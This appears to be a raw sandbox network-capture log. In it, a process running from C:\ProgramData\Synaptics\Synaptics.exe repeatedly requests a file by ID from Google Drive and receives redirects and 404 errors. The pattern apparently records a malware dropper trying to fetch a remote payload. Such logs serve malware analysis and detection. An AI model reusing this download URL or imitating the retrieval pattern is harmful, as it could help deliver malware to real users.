                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      81 | 192.168.2.6 | 50013 | 142.250.185.65 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:41:01 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      82 | 192.168.2.6 | 50014 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:41:01 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      83 | 192.168.2.6 | 50015 | 142.250.185.65 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:41:01 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      84 | 192.168.2.6 | 50021 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:41:02 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:41:02 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:41:02 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-9M3nIeXL6MFHByf4uSR2kw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      85 | 192.168.2.6 | 50022 | 142.250.185.65 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:41:02 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:41:02 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC74Oxl__-inG6dAcVNgbl_Kz4uLLTYSQXcbPXJtxUxNWf_ZRk75h9DXtxwQwhfKr4DQ
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:41:02 GMT
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-Uq6h2JItZOSxoxTdiqpqVg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:41:02 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                      2024-12-30 10:41:02 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="YkXV66GpMG59Vu6r-s59zQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                      2024-12-30 10:41:02 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      86 | 192.168.2.6 | 50023 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:41:02 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:41:02 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:41:02 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-ZsVzgmCWTvN-1XJx9hVltg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      87 | 192.168.2.6 | 50031 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:41:03 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:41:03 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:41:03 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-bZaqENI9DTyTjMUKYKOS8A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      88 | 192.168.2.6 | 50032 | 142.250.185.65 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:41:03 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:41:03 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC6Mi8Z2l1YdcIjnX8j4rJh4LUozlRBqHu7UJFv4feoTXHiRlGYqs7xfvmQ1VjfChrtRYRmjN7I
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:41:03 GMT
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-47A-ybEfCOelnalS-LI6cQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:41:03 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                      2024-12-30 10:41:03 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="oGbJXCH8x5p-s1tcTMp1ag">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                      2024-12-30 10:41:03 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      89 | 192.168.2.6 | 50033 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:41:03 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:41:03 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:41:03 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-7QW3zjkCkYM5SvLmvbW4fQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      90 | 192.168.2.6 | 50034 | 142.250.185.65 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:41:03 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:41:03 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC5WRgAoBA_Yst7XzWoKn8EIbZ8lxMfHpPIJc34E0fCpHissx0pU23vKgWIOlX-My7uP
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:41:03 GMT
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-dyfSp9yr1pF0duvKQtgy_Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:41:03 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                      2024-12-30 10:41:03 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="cQPVQOEVo8vKV9GkyDop0w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                      2024-12-30 10:41:03 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      91 | 192.168.2.6 | 50045 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:41:04 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:41:05 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:41:05 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-TFle4yNkifLY1ASnvtIweQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      92 | 192.168.2.6 | 50048 | 142.250.185.65 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:41:04 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:41:05 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC5s8vuHhHslu7LgAC0HtCgROm2ZfMqK934S3PxNN8JKkGHXoGEkwM5nh-2bJpzp0uD-
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:41:05 GMT
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-SQhGkBFRkkWbegD8wMV8SA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
